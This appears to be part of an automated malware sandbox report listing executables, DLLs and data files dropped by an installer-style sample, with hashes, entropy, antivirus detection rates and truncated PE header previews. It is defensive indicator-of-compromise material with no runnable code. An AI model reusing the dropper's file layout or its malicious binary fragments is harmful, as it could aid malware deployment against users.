                                                                                                                                                                                                                                SHA1:D4F9181E70E3F1AA6C8EDFFCC15B3C3D4BABE36B
                                                                                                                                                                                                                                SHA-256:CE6593A1520591E7DEA2B93FD03116E3FC3B3821A0525322B0A430FAA6B3C0B4
                                                                                                                                                                                                                                SHA-512:8F86693BF9FB4EE0BA021B826663028158D580A0424417A30D8F95EF8853FCD224B5A213BEBA5D99B48BE0607A0A6870158BF1899FE1445DA9CA19A208608527
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'.u.'.u.'.u.......u.....[.u.....?.u...v.4.u...q.4.u...p...u.....".u....6.u.'.t.v.u...p.l.u....&.u.'..%.u...w.&.u.Rich'.u.........................PE..L......Z.....................v......m.............@..........................p.......j....@..............................................;..........P...(...0...=.. t..T...................tt......@n..@...................$........................text.............................. ..`.rdata..............................@..@.data...@...........................@....wixburn8...........................@..@.tls................................@....gfids..............................@..@.rsrc....;.......<..................@..@.reloc...=...0...>..................@..B........................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):12722472
                                                                                                                                                                                                                                Entropy (8bit):7.979757251065637
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:8ZhuxUqr8arjzvp/lrMbq/zJhgRCyy8vMXkixKV8UrAPcADUXpmCt3Fe:ChSUs3rHx/lQbq7oTy8mkiICU0nAX73Q
                                                                                                                                                                                                                                MD5:19B20FC498D366730C470BACAB083FE7
                                                                                                                                                                                                                                SHA1:9D63950C73423991E2884392BC9682D836F9E031
                                                                                                                                                                                                                                SHA-256:8A227B80714A2EE25F04541F20C7BCEE3063D96541DDE42E9C99523E2CD74341
                                                                                                                                                                                                                                SHA-512:0C03E865381FAB1E06B2C42F70A3183BD96B06EAA6524F9D254FF708859B89C92A5F7C7186C84888BD543AD1CBF3D45CA4125ACDAEC059751E9BA2097F90DEDB
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 31%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...'..`.................P...........^.......p....@.................................N_....@......@...................@....... ..6....p...o..........x..../...................................`......................."..D....0.......................text....6.......8.................. ..`.itext.......P.......<.............. ..`.data....7...p...8...T..............@....bss.....m...............................idata..6.... ......................@....didata......0......................@....edata.......@......................@..@.tls.........P...........................rdata..]....`......................@..@.rsrc....o...p...p..................@..@....................................@..@........................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\Fuck.exe.pif
                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):77824
                                                                                                                                                                                                                                Entropy (8bit):5.844474283756578
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:P3rtHL1uKHMbw0KyJKNhkKqEAq/YDC+ggWo+rWEGmlH6W/mqsBdnmz5BZEyY7t8z:fr1RupbQauqK/jhrP/mgnat8z
                                                                                                                                                                                                                                MD5:1725996A931F0F5164CB69E713608F1F
                                                                                                                                                                                                                                SHA1:40C2BA674FCBEEFAAE4BF0E684347BA75CE4E66B
                                                                                                                                                                                                                                SHA-256:E6FE65BF78DAC0AE91F706E5B382D5BCB9699B0D754DDDC8C00F4716CA209E5A
                                                                                                                                                                                                                                SHA-512:B478B3DB392BD072E5DD23A705C71EE75DFC7909139410DE4E32C96A28BECBF84C8788BDFC6F3A5F00AAA30227C7D1611F4B40A73D9564BAD2B8C80402A8185A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 33%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!.v.!.v.!.v..). .v..N..5.v..N....v..N..z.v..+.&.v.!.w.F.v..N..#.v..N.. .v.Rich!.v.........PE..L....>)c.....................`.......$............@..........................@......~...........................................P....0.............................................................. ...@...............T............................text.............................. ..`.rdata...*.......0..................@..@.data....!....... ..................@....rsrc........0....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3036000
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                Entropy (8bit):0.08231524779339361
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:DQANJfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQANJff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                MD5:886A5F9308577FDF19279AA582D0024D
                                                                                                                                                                                                                                SHA1:CDCCC11837CDDB657EB0EF6A01202451ECDF4992
                                                                                                                                                                                                                                SHA-256:BA7EB45B7E9B6990BC63BE63836B74FA2CCB64DCD0C199056B6AE37B1AE735F2
                                                                                                                                                                                                                                SHA-512:FF0692E52368708B36C161A4BFA91EE01CCA1B86F66666F7FC4979C6792D598FF7720A9FAF258F61439DAD61DB55C50D992E99769B1E4D321EC5B98230684BC5
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................S`.....}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\PxuBIvVomAwNlxRyem\EfRhfn
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1107968
                                                                                                                                                                                                                                Entropy (8bit):7.998152820755428
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:24576:zmWAbXH84DRnKCwyElWCAMmKix1x1IDStOX2cBZ8umx7QgbcxWsG2:zmXL8uokzK6DxcD8uqzbcxWX
                                                                                                                                                                                                                                MD5:78C42D6817AF1AD96CABDF6FF2F7F3DA
                                                                                                                                                                                                                                SHA1:ABEADCEE8D9F00C6CCDB0F9D33EDD1006A079384
                                                                                                                                                                                                                                SHA-256:38B2C7A1AF454D382927F81543D86055886BC028634575050367D052EFD26434
                                                                                                                                                                                                                                SHA-512:76A3B3E6AE0EA0F17661314FE391EC8B9B580A7ECFEE0EBE2D830DB3843D5D929D6BF3ADB8CB03F6B87212A607CE001700EA3DC305828C817FF017DD3B766811
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-/..C|..C|..C|...|..C|...|..C|...|..C|...|..C|...|..C|...|..C|...|..C|..B|.C|..|..C|..|..C|...|..C|..|..C|Rich..C|................PE..L....o"c..............................)...........@...........................)...........@...................................)......P'.......................).........8............................................................................text...............................`....rdata... ..........................@....data....P....&..*..................@....rsrc........P'.....................@....reloc...P...`'.....................@....ask..... ....).....................`....adata........).....................@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):5818752
                                                                                                                                                                                                                                Entropy (8bit):6.865404504699206
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:98304:Ok+70PQpwDyrB0c2m2PkosZk/jKre0yzHJ1JZWTS:fW0PQyOrh+KrCDJ1f
                                                                                                                                                                                                                                MD5:E0A6B273C481E7F046BE45457166927F
                                                                                                                                                                                                                                SHA1:4FE433957A243DF328C194D365FEB3EFE56E080C
                                                                                                                                                                                                                                SHA-256:D9FE4AC404D4F610F0A94D78F4968005F7C5AB9718199D37ADA3BE5DB50E8CFB
                                                                                                                                                                                                                                SHA-512:1C239D20DD9F6B6A2C96D332E7658C4D9B12B6E1E1153BFB04B5BCF101FE91F4DF28FA9C4801AD4FA5843A77F3FA99419B0C99A0C4AE5E5B6E76AC0777EB9C2A
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...................................`...........!..L.!This program cannot be run in DOS mode....$........;.GZ..GZ..GZ..N".._Z.../..MZ.../..CZ.../..AZ..!5}.NZ..S1..CZ..S1..EZ.../..hZ...3..EZ.../..FZ.../..lZ.../..FZ..GZ..[Z.../...X...(..%Z.../..EZ..S1..fZ..GZ..UY...(..FZ.../...Z.../..FZ..GZ..FZ.../..FZ..RichGZ..................PE..d....>.b.........."......~,..h,.....P.+........@............................. Y..... .X...`.................................................8S9.......<.......:.P.....X../....X.\p..d.6.T.....................6.(.....6.8.............,.(............................text....},......~,................. ..`.rdata..>&....,..(....,.............@..@.data...x.....9.......9.............@....pdata..P.....:......h:.............@..@CPADinfo8.....<......8<.............@....rsrc.........<......:<.............@..@.reloc..\p....X..r...(X.............@..B........................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3262336
                                                                                                                                                                                                                                Entropy (8bit):6.688279260491484
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:UGtlqLWVwASOETIU6ifs3LWT6aQGsXXX17FM1z5WoIkMWrcYemDzrmP8sjEQ:y8+UbAcNwMGemHrnsj5
                                                                                                                                                                                                                                MD5:5E9AC76C468BB38FFDFCF4A8FA0AD8C9
                                                                                                                                                                                                                                SHA1:002603E931CDEBB3751A3D94C00E65DD2371DD8F
                                                                                                                                                                                                                                SHA-256:B3F88F7C6E1C98CD8F91EBBF528CB5C6DD43DF7E38AD4354EA75E9389EB7FA1C
                                                                                                                                                                                                                                SHA-512:7AB5F32A03854C4AED98F95D8708393B7B089DAFB38627F56F12257207FC2AB0F41C9C2BCA54E45097845F1D7304BB8C83D305A6BF86AD9078AA9D38E2347DDF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........U!}Z4O.Z4O.Z4O.SL..B4O..AK/P4O..AL/^4O..AJ/y4O..AN/\4O.<[..S4O.Z4O.F4O..AK/c6O..FK/84O..FJ/[4O.N_I/[4O.N_N/I4O.Z4N..6O..AK/X4O..AJ/v4O..A..[4O.Z4..[4O..AM/[4O.RichZ4O.........................PE..d....>.b..........".......#...........#........@............................. 4......N2...`.................................................T.........3.8.... 2.pp....1../....3.$j..H.,.T.....................,.(.....,.8.............#..............................text...#.#.......#................. ..`.rdata...U....#..V....#.............@..@.data........@/......$/.............@....pdata..pp... 2..r..../.............@..@.rsrc...8.....3......&1.............@..@.reloc..$j....3..l...,1.............@..B................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):3663232
                                                                                                                                                                                                                                Entropy (8bit):6.45134950449559
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:zYlX04QToato9J/WBFiBnntDPvZiIAVtwggMWh7DgSapCE9d1ng9FOnbNFSvVPE4:G75t8Ng/pYLngnJ6gPvZ
                                                                                                                                                                                                                                MD5:9A00D1D190C8D2F96A63F85EFB3B6BD7
                                                                                                                                                                                                                                SHA1:7919FE3EF84F6F71647093732A31A494136E96B4
                                                                                                                                                                                                                                SHA-256:2AE72C5C7569BFC3729606ECF23D43A70AC5448F683128C08263410F788B4CD9
                                                                                                                                                                                                                                SHA-512:13BF806A1DAE7A8DE2407ABAF5562D3F18A2F02D2508F80E500406B6322723DCECFCF202C05B1293045575A10C1C7A2B67E567AAA9102E66620158C794E5D38C
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........e............|x....q....q....q....q....k.....l....q...q....l.......Y..q.x..q....q.......|....q....Rich...........PE..d...G..a.........." ......$...;.....tt#.......................................`.....F.8...`...........................................3.,.....3.0....@`.X....P^.H.....7../...P`..~..x.0.T.....................0.(.....0.8.............%..............................text.....$.......$................. ..`.rdata...1....%..2....$.............@..@.data.....*..@4..6....4.............@....pdata..H....P^......N5.............@..@.rsrc...X....@`......07.............@..@.reloc...~...P`......67.............@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):659328
                                                                                                                                                                                                                                Entropy (8bit):6.363869452122072
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:QApy86cd+naTz7IR8Td7hNO6j5xqB625KGF+e/dCFnzdhdge:QApscQaTy8dpEgLe1CFzdhdge
                                                                                                                                                                                                                                MD5:A700A38B69B46C6BD84E562CB84016CD
                                                                                                                                                                                                                                SHA1:7ED3C9CF3B2B06504EAE208F91FAFDF6445876E7
                                                                                                                                                                                                                                SHA-256:6FFDB8CE8AF7C66FDD95E2F622A7BE6C35C6FA8097E3888A8821F7E12E812252
                                                                                                                                                                                                                                SHA-512:77B3D0CB076D365F623A285564D586E62D79E56587171F5413CDDF97127ABE02B1E931B7B283076AA880F662BCC262659FA7921B98D9A84EECD5AFCAE389D531
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........o.`.<.`.<.`.<..3<.`.<..]<.`.<...=.`.<...=.`.<...=.`.<...=.`.<...=.`.<...=.`.<.`.<xa.<...=.`.<...=.`.<...=.`.<.._<.`.<.`7<.`.<...=.`.<Rich.`.<................PE..d......a.........." ..........+......{........................................2...........`.........................................p....$..L.........2.@....@2.8[......./....2.l...p...T.......................(......8...............P............................text............................... ..`.rdata...).......*..................@..@.data...X.)..0...`..................@....pdata..8[...@2..\...r..............@..@.rsrc...@.....2.....................@..@.reloc..l.....2.....................@..B................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):98176
                                                                                                                                                                                                                                Entropy (8bit):6.191766865001076
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:ZbQZwEgZDf4mkpxHAnFce6KBE1BLt35pEXOy36Q7a1:ZbQZwENKE1BCXOG6Qe1
                                                                                                                                                                                                                                MD5:9174CCE86288E15D5ADD9E199FEC063B
                                                                                                                                                                                                                                SHA1:3BDEE46513E084529220904040AF11BB0B1F82C8
                                                                                                                                                                                                                                SHA-256:52B31A0B3B8CFACDFBE0B408A722F77D1D553D5BC81383D118CA592FF8732A4E
                                                                                                                                                                                                                                SHA-512:7E08336390AE6CB32A4D58242B9538A2D6086E4D949C29E87EB9931B4CBB306A7AE6E819A79EA53C4206DE89928373136F9E60DA27B9513C0B41C76870FBF034
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........].A.3.A.3.A.3.H...Q.3..Z..E.3...7.I.3...0.E.3...6.].3...2.G.3...2.T.3.A.2.6.3..:.f.3..3.@.3....@.3.A...@.3..1.@.3.RichA.3.........PE..d...C.#`.........." .........0).....<........................................0*.....|Y....`......................................... ...\...|.........*.8.....*......P.../... *.l.......p.......................(... ...8...............P............................text.............................. ..`.rdata...e.......f..................@..@.data....(..@.......$..............@....pdata........*......8..............@..@.rsrc...8.....*......F..............@..@.reloc..l.... *......L..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2417536
                                                                                                                                                                                                                                Entropy (8bit):6.366642119336498
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:OH8QFfUXSCGWF5VXZXxPwp5ZvksudhrwOf65IAo8q:6jBCj57hPwHisuko8q
                                                                                                                                                                                                                                MD5:DC301B230DB0B280502F7664EF36D979
                                                                                                                                                                                                                                SHA1:DC5DD76AE2B099EDA3DFE42412FF1F7707614254
                                                                                                                                                                                                                                SHA-256:D4BF5352011FCE73574618D067B5BBBECBEF135D0CAF4DE5161DFF8462623A60
                                                                                                                                                                                                                                SHA-512:26FCC52C6AD1E4DCA774127F5DC2C228169CEA1EB024FE2E096FC033F8426496C4447EAB63C6271620259FF929C7A35998B11396AE596A64F1E1BD87C27CE1F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......].GE..)...)...)..x....)..x....)..x....).K.*...).K.,.".).K.-.9.).......).......).......)...(...)... ...)...)...).......)......)...+...).Rich..).........PE..d....h.].........." ..........................................................%.......$...`.........................................0..........,.... "...... !.h.....$../....$.H.......T...........................@................................................text...H........................... ..`.rdata..............................@..@.data....E..........................@....pdata..h.... !......V .............@..@.rsrc........ "......T!.............@..@.reloc..H.....$.......$.............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):391552
                                                                                                                                                                                                                                Entropy (8bit):6.693437684975802
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:fnKUo3rRWseDqLDApS/uCFe0Rs+M3XdtzaOmqqDTzuU7KLn/kY:febRWseDyDApcul37ndpaSqnzHKLT
                                                                                                                                                                                                                                MD5:7068D205FEF247AEC397ECA13D308721
                                                                                                                                                                                                                                SHA1:FF25A34C6F81DB10C098176A54447A29DE643526
                                                                                                                                                                                                                                SHA-256:FD8E721C32AB5091B62237A11C09D961A8A93BB11758CF67C3CA3BDA23801E87
                                                                                                                                                                                                                                SHA-512:A97113B311884DE27111CA865C346C14903585B0E9DDF5617B4E8AEF17DEA8940E06D82286A09D8B1DB93AD64C213C1927C04B1850A9874CFCBBC02223696C66
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.5.>.[.>.[.>.[.7..*.[..q..:.[.l._.6.[.l.X.=.[.l.^.'.[.l.Z.:.[...../.[.>.Z...[..._.".[...R...[...[.?.[.....?.[.>..?.[...Y.?.[.Rich>.[.................PE..d...q.`.........." .....<...p+.....h ....................................................`.........................................ps..T....s..@.......0........!......./..............p...................p...(...p................P...............................text....;.......<.................. ..`.rdata..\I...P...J...@..............@..@.data.....(.........................@....pdata...!......."..................@..@.rsrc...0...........................@..@.reloc..............................@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1888640
                                                                                                                                                                                                                                Entropy (8bit):6.585621011884774
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:iTMAY7B/seDVOiqc4l5VklP5N4yS4dy7jILi:iAseDVOxyqfILi
                                                                                                                                                                                                                                MD5:734C92BDC03130A5F5D4EB71C90FFB39
                                                                                                                                                                                                                                SHA1:D35BEB14BE5E57AE2902A294E49B4ED230414FEE
                                                                                                                                                                                                                                SHA-256:A81E2D4E57AD017BBB5EB1EDE09949F18F2A062F2AC6C95711653A8E654DFF30
                                                                                                                                                                                                                                SHA-512:3B30A129BAA1B3A393B1ED44988E66E568A78116A9CB9962DDEB2889C595FE872E64C5CFB6071060EEF76EF17C161F5E4997ACE0E2224192AC94C841AC23182E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                                                                                Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......U..T..............-.....6up.....6uq..............y.....C......C......C......C.......Lu........._...................A.......)............Rich............................PE..d...Y.`.........." .....T................................................................`......................................... ...x............p..0.......(&......./...........g..p....................h..(....g...............p...............................text...aR.......T.................. ..`.rdata..6....p.......X..............@..@.data...8...........................@....pdata..(&.......(..................@..@.nv_fatb8...........................@....nvFatBi0....`......................@....rsrc...0....p......................@..@.reloc..............................@..B................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):600960
                                                                                                                                                                                                                                Entropy (8bit):6.461456013444461
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:ytyzehW71L8JAEfrirOA4xeCluTdtg8aLSXa:yozem1oJAEfrirOA4xeCluTdtg8aLga
                                                                                                                                                                                                                                MD5:47B9EBF37BF5C7EF7A0EF51D270BE99D
                                                                                                                                                                                                                                SHA1:9FBE71D06939657D0D955E1CFE1DEE64971CAFB1
                                                                                                                                                                                                                                SHA-256:1C51B708D501CBD2CEA9D79D1AE7BD5253FCC02E482F80AC9169939022C5F5E3
                                                                                                                                                                                                                                SHA-512:54A9B4B351220E6987870361F48D15825E3ADB15D4E465DA60A8D5ED8327E2FCF1D6BEB45B6B257164B8DBAD772A42522233C8FFB670D2546DEDD325244A2F30
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w..3...3...3...:.r.'...a...,...a...9...a...7...a...5......6...V...>...3...3......2............2......2...Rich3...........................PE..d.....Mb.........."......(.....................@.............................P......t.....`.................................................4e.......0...........U......./...@.......~..........................(.......8............@...............................text....'.......(.................. ..`.rdata..BH...@...J...,..............@..@.data....(......."...v..............@....pdata...U.......V..................@..@CPADinfo8.... ......................@....rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):73
                                                                                                                                                                                                                                Entropy (8bit):3.1377695485602666
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:66YvWCc1KSUtvnnSjjhgLSTLUU:61WCcJUdnShOSTLv
                                                                                                                                                                                                                                MD5:D9229B2BF6EA93565EBBEB81459025C1
                                                                                                                                                                                                                                SHA1:5B8AF056D1A853B73AC94903EDD1D6F167AF8D22
                                                                                                                                                                                                                                SHA-256:F975168980DC06D1F64400C045F73E13E4E68AB8F350AA23304924461CCE1CB6
                                                                                                                                                                                                                                SHA-512:AB8650D51B0606738001E70ACB28F18A7B3A89445BA64F1264908E6D9CC6A94FA93D7B35377E817A5DB98E8050C8C9942782DDCCCEB0C9795F3E05B5E9D4304C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:9.9.9.9..8.8.8.8..8.8.4.4..9.9.9.9..1.1.1.1..208.67.222.222...76.76.19.19
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\is-3CDC9.tmp\FagLhQ.tmp
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1056575
                                                                                                                                                                                                                                Entropy (8bit):4.782467262964209
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:zm5eVEzDtB/fKGUu1GlEHh1pfRH+NYnlqxqiiiNtWl:zm5eVwtB/Shu1GaHh1hRHgYlOiii
                                                                                                                                                                                                                                MD5:C7183C7E129894D2634E14D86C2C9D94
                                                                                                                                                                                                                                SHA1:40A97A2D57DACCD4AE455958BE3F0C44AEF12521
                                                                                                                                                                                                                                SHA-256:1C288BD7A4BF7BF322F3C2949F65AF3302019E93E7F92F211955A15C666A4A8B
                                                                                                                                                                                                                                SHA-512:56A1ADD9DE07EB49DE8440F00772B211E382DC244A5CD9D5D4C7AE73CF56ABDB2E76F3CDB1D81CC8D2CD0E21616844F20C9E24C9F3B21A46307C983A455B5E8B
                                                                                                                                                                                                                                Malicious:false
